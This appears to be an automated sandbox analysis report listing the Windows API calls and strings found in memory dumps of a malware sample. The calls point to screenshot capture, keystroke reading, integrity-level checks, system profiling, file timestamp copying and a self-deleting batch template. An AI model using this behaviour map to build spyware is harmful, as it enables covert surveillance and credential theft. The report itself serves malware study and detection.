Part of subcall function 00FCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FCCEB9

GetTickCount.KERNEL32 ref: 00FD3FC5

Part of subcall function 00FCF1EF: memcmp.MSVCRT ref: 00FCF1FB

Part of subcall function 00FCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCD70
Part of subcall function 00FCCD5A: memcpy.MSVCRT ref: 00FCCDCD
Part of subcall function 00FCCD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1,?,00000002), ref: 00FCCDDD
Part of subcall function 00FCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00FCCE11
Part of subcall function 00FCCD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCE9F

Part of subcall function 00FD3906: memset.MSVCRT ref: 00FD39D5
Part of subcall function 00FD3906: memcpy.MSVCRT ref: 00FD3A30
Part of subcall function 00FD3906: memcmp.MSVCRT ref: 00FD3AAB
Part of subcall function 00FD3906: memcpy.MSVCRT ref: 00FD3AFF
Part of subcall function 00FD3906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00FD3BD2
Part of subcall function 00FD3906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00FD3BF0

GetTickCount.KERNEL32 ref: 00FD3FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00FD4021

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00FD4046
LeaveCriticalSection.KERNEL32 ref: 00FD405C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C33D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00C33D5E
EnterCriticalSection.KERNEL32 ref: 00C33D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00C33DB8
GetTickCount.KERNEL32 ref: 00C33DCB

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

GetTickCount.KERNEL32 ref: 00C33FC5

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
Part of subcall function 00C2CD5A: memcpy.MSVCRT ref: 00C2CDCD
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD
Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C33906: memset.MSVCRT ref: 00C339D5
Part of subcall function 00C33906: memcpy.MSVCRT ref: 00C33A30
Part of subcall function 00C33906: memcmp.MSVCRT ref: 00C33AAB
Part of subcall function 00C33906: memcpy.MSVCRT ref: 00C33AFF
Part of subcall function 00C33906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BD2
Part of subcall function 00C33906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BF0

GetTickCount.KERNEL32 ref: 00C33FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00C34021

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00C34046
LeaveCriticalSection.KERNEL32 ref: 00C3405C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD3906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00FE5594: GetSystemTime.KERNEL32(?), ref: 00FE55BA
Part of subcall function 00FE5594: Sleep.KERNEL32(000005DC), ref: 00FE55D3
Part of subcall function 00FE5594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 00FE55DC

Part of subcall function 00FCECBD: memcmp.MSVCRT ref: 00FCED1A
Part of subcall function 00FCECBD: memcpy.MSVCRT ref: 00FCED5A

Part of subcall function 00FE4BA2: memcpy.MSVCRT ref: 00FE4BB2

Part of subcall function 00FCEE09: memset.MSVCRT ref: 00FCEE1C
Part of subcall function 00FCEE09: memcpy.MSVCRT ref: 00FCEE37
Part of subcall function 00FCEE09: memcpy.MSVCRT ref: 00FCEE5F
Part of subcall function 00FCEE09: memcpy.MSVCRT ref: 00FCEE83

memset.MSVCRT ref: 00FD39D5

Part of subcall function 00FCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCD70
Part of subcall function 00FCCD5A: memcpy.MSVCRT ref: 00FCCDCD
Part of subcall function 00FCCD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1,?,00000002), ref: 00FCCDDD
Part of subcall function 00FCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00FCCE11
Part of subcall function 00FCCD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FD3FA1), ref: 00FCCE9F

Part of subcall function 00FCF1A8: EnterCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1B8
Part of subcall function 00FCF1A8: LeaveCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1E2

memcpy.MSVCRT ref: 00FD3A30

Part of subcall function 00FCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FCCEB9

memcmp.MSVCRT ref: 00FD3AAB

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

memcpy.MSVCRT ref: 00FD3AFF

Part of subcall function 00FCF0E1: memcmp.MSVCRT ref: 00FCF0FD

Part of subcall function 00FCF1EF: memcmp.MSVCRT ref: 00FCF1FB

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

Part of subcall function 00FD23F1: memcpy.MSVCRT ref: 00FD2409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00FD3BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00FD3BF0

Part of subcall function 00FCEEA9: memcpy.MSVCRT ref: 00FCEED2

Part of subcall function 00FCEDAE: memcpy.MSVCRT ref: 00FCEDF9

Part of subcall function 00FCF040: memcmp.MSVCRT ref: 00FCF0B6

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FFE360: _errno.MSVCRT ref: 00FFE37B
Part of subcall function 00FFE360: _errno.MSVCRT ref: 00FFE3AD

Strings

2, xrefs: 00FD3B51

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C33906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00C45594: GetSystemTime.KERNEL32(?), ref: 00C455BA
Part of subcall function 00C45594: Sleep.KERNEL32(000005DC), ref: 00C455D3
Part of subcall function 00C45594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 00C455DC

Part of subcall function 00C2ECBD: memcmp.MSVCRT ref: 00C2ED1A
Part of subcall function 00C2ECBD: memcpy.MSVCRT ref: 00C2ED5A

Part of subcall function 00C44BA2: memcpy.MSVCRT ref: 00C44BB2

Part of subcall function 00C2EE09: memset.MSVCRT ref: 00C2EE1C
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE37
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE5F
Part of subcall function 00C2EE09: memcpy.MSVCRT ref: 00C2EE83

memset.MSVCRT ref: 00C339D5

Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CD70
Part of subcall function 00C2CD5A: memcpy.MSVCRT ref: 00C2CDCD
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1,?,00000002), ref: 00C2CDDD
Part of subcall function 00C2CD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00C2CE11
Part of subcall function 00C2CD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C33FA1), ref: 00C2CE9F

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memcpy.MSVCRT ref: 00C33A30

Part of subcall function 00C2CEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C2CEB9

memcmp.MSVCRT ref: 00C33AAB

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

memcpy.MSVCRT ref: 00C33AFF

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Part of subcall function 00C323F1: memcpy.MSVCRT ref: 00C32409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00C33BF0

Part of subcall function 00C2EEA9: memcpy.MSVCRT ref: 00C2EED2

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Part of subcall function 00C2F040: memcmp.MSVCRT ref: 00C2F0B6

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C5E360: _errno.MSVCRT ref: 00C5E37B
Part of subcall function 00C5E360: _errno.MSVCRT ref: 00C5E3AD

Strings

2, xrefs: 00C33B51

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 00C304EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C304FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C30530
memset.MSVCRT ref: 00C30570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C30581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00C305C1
memset.MSVCRT ref: 00C3062C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00FD5160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00FD5179
GetLastError.KERNEL32(?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD5183

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 00FD51AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD51BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD51D1

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CloseHandle.KERNEL32(00000001), ref: 00FD51FD

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00C35160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00C35179
GetLastError.KERNEL32(?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C35183

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 00C351AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C351BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C351D1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32(00000001), ref: 00C351FD

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF3382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00FF33A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00FF33F2

Part of subcall function 00FF2EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00FCFD6D,?,00000004,00007530,?,?,?,?), ref: 00FF2ED9
Part of subcall function 00FF2EA3: WSASetLastError.WS2_32(?), ref: 00FF2F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00FF34D2
shutdown.WS2_32(?,00000001), ref: 00FF34FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00FF3526

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 00FF357A

Strings

, xrefs: 00FF34E3

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C53382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00C533A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00C533F2

Part of subcall function 00C52EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00C2FD6D,?,00000004,00007530,?,?,?,?), ref: 00C52ED9
Part of subcall function 00C52EA3: WSASetLastError.WS2_32(?), ref: 00C52F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00C534D2
shutdown.WS2_32(?,00000001), ref: 00C534FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00C53526

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

WSASetLastError.WS2_32(0000274C,00C63516), ref: 00C5357A

Strings

, xrefs: 00C534E3

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 00C2E010
LeaveCriticalSection.KERNEL32 ref: 00C2E0C0

Part of subcall function 00C34085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00C34097
Part of subcall function 00C34085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00C340AF
Part of subcall function 00C34085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C340EE
Part of subcall function 00C34085: CreateCompatibleDC.GDI32 ref: 00C340FF
Part of subcall function 00C34085: LoadCursorW.USER32(00000000,00007F00), ref: 00C34115
Part of subcall function 00C34085: GetIconInfo.USER32(?,?), ref: 00C34129
Part of subcall function 00C34085: GetCursorPos.USER32(?), ref: 00C34138
Part of subcall function 00C34085: GetDeviceCaps.GDI32(?,00000008), ref: 00C3414F
Part of subcall function 00C34085: GetDeviceCaps.GDI32(?,0000000A), ref: 00C34158
Part of subcall function 00C34085: CreateCompatibleBitmap.GDI32(?,?), ref: 00C34164
Part of subcall function 00C34085: SelectObject.GDI32 ref: 00C34172
Part of subcall function 00C34085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00C34193
Part of subcall function 00C34085: DrawIcon.USER32(?,?,?,?), ref: 00C341C5
Part of subcall function 00C34085: SelectObject.GDI32(?,00000008), ref: 00C341E1
Part of subcall function 00C34085: DeleteObject.GDI32 ref: 00C341E8
Part of subcall function 00C34085: DeleteDC.GDI32 ref: 00C341EF
Part of subcall function 00C34085: DeleteDC.GDI32 ref: 00C341F6
Part of subcall function 00C34085: FreeLibrary.KERNEL32(?), ref: 00C34206
Part of subcall function 00C34085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00C3421C
Part of subcall function 00C34085: FreeLibrary.KERNEL32(?), ref: 00C34230

GetTickCount.KERNEL32 ref: 00C2E06A
GetCurrentProcessId.KERNEL32 ref: 00C2E071

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetKeyboardState.USER32(?), ref: 00C2E0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 00C2E0FF

Part of subcall function 00C2DE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DEEF
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF13
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF2A
Part of subcall function 00C2DE64: memcpy.MSVCRT ref: 00C2DF4A
Part of subcall function 00C2DE64: LeaveCriticalSection.KERNEL32 ref: 00C2DF65

Strings

, xrefs: 00C2E11D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCB28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 00FCB29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 00FCB2B2
GetNativeSystemInfo.KERNEL32(?), ref: 00FCB2E3

Part of subcall function 00FE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00FE0D60

GetSystemMetrics.USER32(0000004F), ref: 00FCB370

Part of subcall function 00FE0FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00FEBD4B,?), ref: 00FE0FF2

Part of subcall function 00FE0D19: RegFlushKey.ADVAPI32 ref: 00FE0D29
Part of subcall function 00FE0D19: RegCloseKey.ADVAPI32 ref: 00FE0D31

GetSystemMetrics.USER32(00000050), ref: 00FCB363
GetSystemMetrics.USER32(0000004E), ref: 00FCB36A

Strings

@, xrefs: 00FCB2AB

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2B28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 00C2B29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 00C2B2B2
GetNativeSystemInfo.KERNEL32(?), ref: 00C2B2E3

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

GetSystemMetrics.USER32(0000004F), ref: 00C2B370

Part of subcall function 00C40FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00C4BD4B,?), ref: 00C40FF2

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

GetSystemMetrics.USER32(00000050), ref: 00C2B363
GetSystemMetrics.USER32(0000004E), ref: 00C2B36A

Strings

@, xrefs: 00C2B2AB

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEB9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

PathIsDirectoryW.SHLWAPI(?), ref: 00FEBA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00FEBA30

Part of subcall function 00FEB883: memcpy.MSVCRT ref: 00FEB9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00FEBA76

Part of subcall function 00FCE717: memcpy.MSVCRT ref: 00FCE775
Part of subcall function 00FCE717: memcpy.MSVCRT ref: 00FCE78A
Part of subcall function 00FCE717: memcpy.MSVCRT ref: 00FCE79F
Part of subcall function 00FCE717: memcpy.MSVCRT ref: 00FCE7AE
Part of subcall function 00FCE717: SetFileTime.KERNEL32(?,?,?,?), ref: 00FCE813

CloseHandle.KERNEL32 ref: 00FEBA95
PathRemoveFileSpecW.SHLWAPI ref: 00FEBAA2

Part of subcall function 00FCE348: CloseHandle.KERNEL32 ref: 00FCE354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FEB9DE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FE4ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00FE4EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00FE4F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00FE4F59
LocalFree.KERNEL32(00000001), ref: 00FE4F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00FE4EFC
ProfileImagePath, xrefs: 00FE4F26

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C44ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C44EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00C44F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00C44F59
LocalFree.KERNEL32(00000001), ref: 00C44F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00C44EFC
ProfileImagePath, xrefs: 00C44F26

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2AB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00C2ABB8
GetCommandLineW.KERNEL32 ref: 00C2ABD9

Part of subcall function 00C54333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C5435D
Part of subcall function 00C54333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00C54392

GetUserNameExW.SECUR32(00000002,?), ref: 00C2AC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 00C2AC47
GetUserDefaultUILanguage.KERNEL32 ref: 00C2ACB9
memcpy.MSVCRT ref: 00C2ACED
memcpy.MSVCRT ref: 00C2AD02
memcpy.MSVCRT ref: 00C2AD18

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCFFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00FD23DE,?,?,?,00000000), ref: 00FCFFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00FD0009
CloseHandle.KERNEL32 ref: 00FD001C

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

memcpy.MSVCRT ref: 00FD003F
memset.MSVCRT ref: 00FD0059
memcpy.MSVCRT ref: 00FD009F
memset.MSVCRT ref: 00FD00BD

Part of subcall function 00FD5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5B48
Part of subcall function 00FD5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FD5B6C
Part of subcall function 00FD5B40: CloseHandle.KERNEL32 ref: 00FD5B7C
Part of subcall function 00FD5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00FCD091,?,?,00000000,0000EA60,00000000), ref: 00FD5BAC

Part of subcall function 00FD5BB5: EnterCriticalSection.KERNEL32(0111201C,01112010,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5BBE
Part of subcall function 00FD5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FD5BF7
Part of subcall function 00FD5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00FDE48F,00000000,00000000,00000002), ref: 00FD5C16
Part of subcall function 00FD5BB5: GetLastError.KERNEL32(?,000000FF,00FDE48F,00000000,00000000,00000002,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001), ref: 00FD5C20
Part of subcall function 00FD5BB5: TerminateThread.KERNEL32 ref: 00FD5C28
Part of subcall function 00FD5BB5: CloseHandle.KERNEL32 ref: 00FD5C2F
